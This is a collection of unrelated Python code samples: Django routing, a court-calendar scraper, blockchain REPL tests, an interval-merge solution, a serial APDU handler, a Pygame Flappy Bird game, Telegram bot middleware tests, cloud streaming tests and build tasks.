credentials = json.loads(await anoncreds.prover_get_credentials(wallet_handle, "{}"))
assert len(credentials) == 3
| StarcoderdataPython |
6507888 | <reponame>gabrielamelian/django-docker-code-test<gh_stars>0
from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.conf.urls import include, url
CACHE_TIME = getattr(settings, 'ROBOTS_CACHE_TIMEOUT', 60*60)
urlpatterns = [
url(r'', include("questionnaire.urls")),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(
settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| StarcoderdataPython |
1918557 | <reponame>cathy-ludwig/courtcase_tracker
import datetime
import pytz
import requests
from bs4 import BeautifulSoup
def update_db(conn, table_rows):
# Creating a cursor object using the cursor() method
cursor = conn.cursor()
for table_row in table_rows[3:]:
try:
cname, date, time, hearing_type, caption, case_id = [c.get_text().strip() for c in table_row.find_all("td")]
local = pytz.timezone("America/Chicago")
localdatetime = datetime.datetime.strptime(f"{date}T{time}", "%m/%d/%YT%I:%M%p")
local_dt = local.localize(localdatetime, is_dst=None)
utc_dt = local_dt.isoformat(timespec="minutes")
cursor.execute("INSERT INTO court_cases.court_case (person_id, court_date, hearing_type, case_id, caption) VALUES (%s, %s, %s, %s, %s)", ('1', date, hearing_type, case_id, caption))
except Exception:
continue
# Preparing SQL queries to INSERT a record into the database.
# cursor.execute('INSERT INTO court_cases.court_case(person_id, court_date, hearing_type, case_id, caption) VALUES (1, {cname}, {date} {time}, {hearing_type}, {case_id}, {caption})')
conn.commit()
def get_data(date):
url = 'https://www.nebraska.gov/courts/calendar/index.cgi'
myobj = {
'court': 'C',
'countyC': 'Douglas',
'countyD': '',
'selectRadio': 'date',
'searchField': date,
'submitButton': 'Submit'
}
response = requests.post(url, data=myobj)
content = str(response.content, "utf-8")
soup = BeautifulSoup(content, features="html.parser")
table_rows = soup.find_all('tr')
return table_rows
if __name__ == '__main__':
table_rows = get_data('12/14/2020')
print(dir(table_rows))
update_db(table_rows)
| StarcoderdataPython |
330067 | <reponame>ArturGajowy/rchain<filename>integration-testing/test/test_repl.py
import pytest
import conftest
from rnode_testing.rnode import started_standalone_bootstrap_node
def without_banner_and_prompt(input, output):
banner_and_prompt = '\x1b[31m\n ╦═╗┌─┐┬ ┬┌─┐┬┌┐┌ ╔╗╔┌─┐┌┬┐┌─┐ ╦═╗╔═╗╔═╗╦ \n ╠╦╝│ ├─┤├─┤││││ ║║║│ │ ││├┤ ╠╦╝║╣ ╠═╝║ \n ╩╚═└─┘┴ ┴┴ ┴┴┘└┘ ╝╚╝└─┘─┴┘└─┘ ╩╚═╚═╝╩ ╩═╝\n \x1b[0m\n\x1b[32mrholang $ '
assert output.startswith(banner_and_prompt)
without_banner_and_prompt = output[len(banner_and_prompt):]
colored_input = '\x1b[0m{}\n'.format(input)
assert without_banner_and_prompt.startswith(colored_input)
return without_banner_and_prompt[len(colored_input):]
def test_repl(started_standalone_bootstrap_node):
repl_commands = [
'5',
'new s(`rho:io:stdout`) in { s!("foo") }',
'@"listCh"!([1, 2, 3]) | for(@list <- @"listCh"){ match list { [a, b, c] => { new s(`rho:io:stdout`) in { s!(a) } } } }',
]
for repl_cmd in repl_commands:
started_standalone_bootstrap_node.repl(repl_cmd)
def test_repl_detects_invalid_rholang(started_standalone_bootstrap_node):
input = 'foo'
output = started_standalone_bootstrap_node.repl(input, stderr=False)
without_prologue = without_banner_and_prompt(input, output)
assert without_prologue.startswith('\x1b[34mError: coop.rchain.rholang.interpreter.errors$TopLevelFreeVariablesNotAllowedError')
| StarcoderdataPython |
4846479 | # DomirScire
import operator
PEOPLE = [('Donald', 'Trump', 7.85),
('Vladimir', 'Putin', 3.626),
('Jinping', 'Xi', 10.603)]
def format_sort_records(list_of_tuples):
output = []
template = '{1:10} {0:10} {2:5.2f}'
for person in sorted(list_of_tuples,
key=operator.itemgetter(1, 0)):
output.append(template.format(*person))
return output
if __name__ == "__main__":
print('\n'.join(format_sort_records(PEOPLE)))
| StarcoderdataPython |
9632279 | """577 · Merge K Sorted Interval Lists"""
"""
Definition of Interval.
class Interval(object):
def __init__(self, start, end):
self.start = start
self.end = end
"""
class Solution:
"""
@param intervals: the given k sorted interval lists
@return: the new sorted interval list
"""
def mergeKSortedIntervalLists(self, intervals):
# write your code here
n = len(intervals)
if n == 0:
return []
if n == 1:
return intervals[0]
mid = n // 2
left = self.mergeKSortedIntervalLists(intervals[:mid])
right = self.mergeKSortedIntervalLists(intervals[mid:])
i = 0
j = 0
res = []
while i < len(left) and j < len(right):
if left[i].start < right[j].start:
self.pushBack(res, left[i])
i += 1
else:
self.pushBack(res, right[j])
j += 1
while i < len(left):
self.pushBack(res, left[i])
i += 1
while j < len(right):
self.pushBack(res, right[j])
j += 1
return res
def pushBack(self, intervals_prev, interval):
if not intervals_prev:
intervals_prev.append(interval)
return
last_interval = intervals_prev[-1]
if interval.start <= last_interval.end:
intervals_prev[-1].end = max(intervals_prev[-1].end, interval.end)
return
else:
intervals_prev.append(interval)
return
| StarcoderdataPython |
9645638 | default_app_config = 'apps.index.apps.IndexAppConfig'
| StarcoderdataPython |
6678019 | <reponame>segrids/arduino_due<gh_stars>1-10
""" MIT License
Copyright (c) 2021 by <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Author: <NAME>
"""
from time import sleep
from . import uart
from .hexen import *
class Timeout(Exception):
pass
"""
apdu()
a wrapper for the Apdu class
"""
def apdu(port_or_slot, remote=False):
if remote:
serial = rpcserial.SerialClient()
serial.open(port_or_slot)
else:
serial = rpcserial.Serial(port_or_slot)
return Apdu(serial)
"""
class Apdu()
Apdu package handler
"""
class Apdu():
def __init__(self, serial):
self.serial = serial
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.disconnect()
def connect(self):
self.serial.open()
def disconnect(self):
self.serial.close()
def clear_buffer(self):
self.serial.read_all()
def sendreceive(self, ins, data=b'', res_len=0, cla=b'L', read_response=True):
"""Issue an APDU command.
Args:
ins: A single byte (bytes of length 1) specifying the command.
data: Optional bytes to be sent as the body of the request. Request
body left empty by default.
res_len: Optional integer number of bytes expected as the response
body (thus excluding the 16-bit status code).
read_response: Optional boolean to specify whether to wait for and
parse the response or return immediately.
Returns:
A tuple containing the 16-bit status code and the bytes of the
response body or None if `read_response` is false.
"""
cmd = cla + ins + bu16(len(data)) + data + bu16(res_len)
# print("sending APDU", cmd) # uncomment for debugging
self.serial.write(cmd)
sleep(0.001) ### added for adapter class
if read_response and res_len is not None:
res = self.serial.read(res_len + 2)
if len(res) != res_len + 2:
raise Timeout(
'Received {} bytes in {} seconds but expected {}.'.format(
len(res), self.serial.timeout, res_len + 2))
return res[:-2], ub16(res[-2:])
| StarcoderdataPython |
3562991 | import logging
from django.conf import settings
from rest_framework.response import Response
from django_telegram.bot.middleware import TelegramMiddleware
SEND_MSG_F = 'django_telegram.bot.middleware.send_message'
def cond_fn(data):
raise Exception('ERR')
def test_process_response_not_json(mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'conditions': {
'type': 'value',
'field': 'field',
'field_value': 'value',
},
'message': 'msg',
}],
},
}
response = Response(data="model", headers={'Content-Type': 'text/html'})
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(None) == response
mock_send_message.assert_not_called()
def test_process_response_matches(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'conditions': {
'type': 'value',
'field': 'field',
'field_value': 'value',
},
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_called_once_with(
'[dev] view with pk pk-1 has ended with 1 and sends message: msg',
)
def test_process_response_matches_no_conditions(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_called_once_with(
'[dev] view with pk pk-1 has ended with 1 and sends message: msg',
)
def test_process_response_matches_by_func(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'conditions': {
'type': 'function',
'function': 'tests.test_configurator.cond_fn',
},
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_called_once_with(
'[dev] view with pk pk-1 has ended with 1 and sends message: msg',
)
def test_process_response_204_no_content(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'conditions': {
'type': 'function',
'function': 'tests.test_configurator.cond_fn',
},
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 204
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_not_called()
def test_process_response_matches_by_func_err(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'conditions': {
'type': 'function',
'function': 'tests.bot.test_middleware.cond_fn',
},
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_not_called()
def test_process_response_not_matches_by_response_code(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'conditions': {
'type': 'value',
'field': 'field',
'field_value': 'value',
},
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 5
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_not_called()
def test_get_field_value():
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'conditions': {
'type': 'value',
'field': 'field',
'field_value': 'value',
},
'message': 'msg',
}],
},
}
mw = TelegramMiddleware(None)
model = {
'field': 'value',
}
assert mw.get_field_value(model, 'field') == 'value'
def test_get_field_value_complex():
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'trigger_codes': [1, 2],
'conditions': {
'type': 'value',
'field': 'field.field.field',
'field_value': 'value',
},
'message': 'msg',
}],
},
}
mw = TelegramMiddleware(None)
model = {
'field': {
'field': {
'field': 'value',
},
},
}
assert mw.get_field_value(model, 'field.field.field') == 'value'
def test_process_response_config_does_not_exist(django_request, mocker):
mock_send_message = mocker.patch(
SEND_MSG_F,
return_value=True,
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view-2',
'conditions': {
'type': 'function',
'function': 'tests.bot.test_middleware.cond_fn',
},
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_not_called()
def test_process_response_exception(django_request, mocker, caplog):
mock_send_message = mocker.patch(
SEND_MSG_F,
side_effect=Exception('ERR'),
)
settings.TELEGRAM_BOT = {
'CONVERSATIONS': [
'tests.bot.conftest.ConvTest',
],
'TOKEN': 'token',
'COMMANDS_SUFFIX': 'dev',
'HISTORY_LOOKUP_MODEL_PROPERTY': 'created_at',
'MIDDLEWARE': {
'CHAT_ID': 123,
'RULES': [{
'view': 'view',
'conditions': {
'type': 'function',
'function': 'tests.test_configurator.cond_fn',
},
'trigger_codes': [1, 2],
'message': 'msg',
}],
},
}
response = Response(
data={'field': 'value'},
headers={'Content-Type': 'application/json'},
)
response._is_rendered = True
response.content = '{"field":"value"}'
response.render()
response.status_code = 1
def get_response(self):
return response
with caplog.at_level(logging.ERROR):
mw = TelegramMiddleware(get_response)
assert mw(django_request) == response
mock_send_message.assert_called_once()
expected_config = settings.TELEGRAM_BOT['MIDDLEWARE']['RULES'][0]
assert (
f'TelegramMiddleware rule {expected_config} finished with error: ERR'
) in caplog.records[0].message
| StarcoderdataPython |
5081634 | import pygame, sys, random
def draw_floor():
screen.blit(floor_surface, (floor_x_pos,900))
screen.blit(floor_surface, (floor_x_pos + 576,900))
def create_pipe():
random_pipe_pos = random.randint(350,800)
bottom_pipe = pipe_surface.get_rect(midtop = (700,random_pipe_pos))
top_pipe = pipe_surface.get_rect(midbottom = (700,random_pipe_pos-250))
return bottom_pipe, top_pipe
def move_pipes(pipes):
for pipe in pipes:
pipe.centerx -= 2
visible_pipes = [pipe for pipe in pipes if pipe.right > -50]
return visible_pipes
def draw_pipes(pipes):
bottom = True
for pipe in pipes:
if bottom:
screen.blit(pipe_surface, pipe)
else:
flip_pipe = pygame.transform.flip(pipe_surface, False, True)
screen.blit(flip_pipe, pipe)
bottom = not bottom
def check_collision(pipes):
for pipe in pipes:
if bird_rect.colliderect(pipe):
hit_sound.play()
death_sound.play()
return False
if bird_rect.top <= -100 or bird_rect.bottom >= 900:
hit_sound.play()
death_sound.play()
return False
return True
def rotate_bird(bird):
new_bird = pygame.transform.rotozoom(bird, -bird_movement*3, 1)
return new_bird
def bird_animation():
new_bird = bird_frames[bird_index]
new_bird_rect = new_bird.get_rect(center = (100,bird_rect.centery))
return new_bird, new_bird_rect
def score_display():
if game_active:
score_surface = game_font.render(str(score), True, (255,255,255))
score_rect = score_surface.get_rect(center = (288,100))
screen.blit(score_surface, score_rect)
else:
score_surface = game_font.render(f'Score: {score}', True, (255,255,255))
score_rect = score_surface.get_rect(center = (288,100))
screen.blit(score_surface, score_rect)
high_score_surface = game_font.render(f'High score: {high_score}', True, (255,255,255))
high_score_rect = high_score_surface.get_rect(center = (288,850))
screen.blit(high_score_surface, high_score_rect)
def update_score(score, high_score):
return max(score, high_score)
def pipe_score_check():
global score
for i in range(0, len(pipe_list), 2):
if 98 < pipe_list[i].centerx < 102:
score += 1
score_sound.play()
pygame.init()
screen = pygame.display.set_mode((576,1024))
clock = pygame.time.Clock()
game_font = pygame.font.Font('04B_19.ttf', 40)
# game variables
gravity = 0.25
bird_movement = 0
game_active = True
score = 0
high_score = 0
bg_surface = pygame.image.load('assets/background-day.png').convert() # easier for pygame to work with
bg_surface = pygame.transform.scale(bg_surface, (576,1024))
floor_surface = pygame.image.load('assets/base.png').convert()
floor_surface = pygame.transform.scale2x(floor_surface)
floor_x_pos = 0
bird_downflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-downflap.png').convert_alpha())
bird_midflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-midflap.png').convert_alpha())
bird_upflap = pygame.transform.scale2x(pygame.image.load('assets/yellowbird-upflap.png').convert_alpha())
bird_frames = [bird_downflap, bird_midflap, bird_upflap]
bird_index = 1
bird_surface = bird_frames[bird_index]
bird_rect = bird_surface.get_rect(center = (100,512))
BIRDFLAP = 0
pipe_surface = pygame.image.load('assets/pipe-green.png').convert()
pipe_surface = pygame.transform.scale2x(pipe_surface)
pipe_list = []
SPAWNPIPE = 60
game_over_surface = pygame.transform.scale2x(pygame.image.load('assets/message.png').convert_alpha())
game_over_rect = game_over_surface.get_rect(center = (288,512))
flap_sound = pygame.mixer.Sound('sound/sfx_wing.wav')
hit_sound = pygame.mixer.Sound('sound/sfx_hit.wav')
death_sound = pygame.mixer.Sound('sound/sfx_die.wav')
score_sound = pygame.mixer.Sound('sound/sfx_point.wav')
while True:
BIRDFLAP = (BIRDFLAP + 1) % 7
if BIRDFLAP == 0:
bird_index = (bird_index + 1) % 3
bird_surface, bird_rect = bird_animation()
SPAWNPIPE = (SPAWNPIPE + 1) % 170
if SPAWNPIPE == 0:
pipe_list.extend(create_pipe())
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
if game_active:
bird_movement = -8.5
flap_sound.play()
else:
game_active = True
pipe_list.clear()
bird_rect.center = (100,512)
bird_movement = 0
score = 0
screen.blit(bg_surface, (0,0))
if game_active:
# bird
bird_movement += gravity
rotated_bird = rotate_bird(bird_surface)
bird_rect.centery += bird_movement
screen.blit(rotated_bird, bird_rect)
game_active = check_collision(pipe_list)
# pipes
pipe_list = move_pipes(pipe_list)
draw_pipes(pipe_list)
# score
pipe_score_check()
score_display()
else:
screen.blit(game_over_surface, game_over_rect)
high_score = update_score(score, high_score)
score_display()
# floor
floor_x_pos -= 2
draw_floor()
if floor_x_pos <= -576:
floor_x_pos = 0
pygame.display.update()
clock.tick(120)
| StarcoderdataPython |
310004 | # Copyright 2022 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import uuid
import pytest
import create_channel
import create_channel_event
import create_input
import delete_channel
import delete_channel_event
import delete_input
import get_channel_event
import list_channel_events
import start_channel
import stop_channel
project_name = os.environ["GOOGLE_CLOUD_PROJECT"]
location = "us-central1"
input_id = f"python-test-input-{uuid.uuid4()}"
channel_id = f"python-test-channel-{uuid.uuid4()}"
event_id = f"python-test-event-{uuid.uuid4()}"
output_bucket_name = f"python-test-bucket-{uuid.uuid4()}"
output_uri = f"gs://{output_bucket_name}/channel-test/"
def test_channel_event_operations(capsys: pytest.fixture) -> None:
# Set up
channel_name_project_id = (
f"projects/{project_name}/locations/{location}/channels/{channel_id}"
)
event_name_project_id = f"projects/{project_name}/locations/{location}/channels/{channel_id}/events/{event_id}"
create_input.create_input(project_name, location, input_id)
create_channel.create_channel(
project_name, location, channel_id, input_id, output_uri
)
out, _ = capsys.readouterr()
assert channel_name_project_id in out
start_channel.start_channel(project_name, location, channel_id)
out, _ = capsys.readouterr()
assert "Started channel" in out
# Tests
create_channel_event.create_channel_event(
project_name, location, channel_id, event_id
)
out, _ = capsys.readouterr()
assert event_name_project_id in out
get_channel_event.get_channel_event(project_name, location, channel_id, event_id)
out, _ = capsys.readouterr()
assert event_name_project_id in out
list_channel_events.list_channel_events(project_name, location, channel_id)
out, _ = capsys.readouterr()
assert event_name_project_id in out
delete_channel_event.delete_channel_event(
project_name, location, channel_id, event_id
)
out, _ = capsys.readouterr()
assert "Deleted channel event" in out
# Clean up
stop_channel.stop_channel(project_name, location, channel_id)
out, _ = capsys.readouterr()
assert "Stopped channel" in out
delete_channel.delete_channel(project_name, location, channel_id)
out, _ = capsys.readouterr()
assert "Deleted channel" in out
delete_input.delete_input(project_name, location, input_id)
| StarcoderdataPython |
4930461 | <reponame>eclipse-ib/Software-University-Fundamentals_Module
numbers = input().split(", ")
new_numbers = []
for i in numbers:
if int(i) == 0:
pass
else:
new_numbers.append(int(i))
for i in numbers:
if int(i) == 0:
new_numbers.append(0)
print(f"{new_numbers}")
| StarcoderdataPython |
5002903 | import subprocess
from invoke import task
SRC_DIR = "signal_interpreter_server"
TEST_DIR = "tests"
UNIT_DIR = "tests/unit"
INTEGRATION_DIR = "tests/integration"
COV_PATH = ".coveragerc"
@task
def style(_):
cmd = f"pycodestyle {SRC_DIR} --ignore=E501"
subprocess.call(cmd, shell=True)
@task
def style_test(_):
cmd = f"pycodestyle {TEST_DIR} --ignore=E501"
subprocess.call(cmd, shell=True)
@task
def lint(_):
cmd = f"pylint {SRC_DIR}"
subprocess.call(cmd, shell=True)
@task
def lint_test(_):
cmd = f"pylint {TEST_DIR}"
subprocess.call(cmd, shell=True)
@task
def unit_test(_):
cmd = f"python -m pytest {UNIT_DIR} --cov {SRC_DIR} --cov-config={COV_PATH}"
subprocess.call(cmd, shell=True)
@task
def integration_test(_):
cmd = f"python -m pytest {INTEGRATION_DIR} --cov {SRC_DIR} --cov-config={COV_PATH} --cov-fail-under=75"
subprocess.call(cmd, shell=True) | StarcoderdataPython |
8044240 | import pytest
# we need to register the utils helper for assert rewriting in order to get descriptive assertion errors.
pytest.register_assert_rewrite("services.ui_backend_service.tests.integration_tests.utils")
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.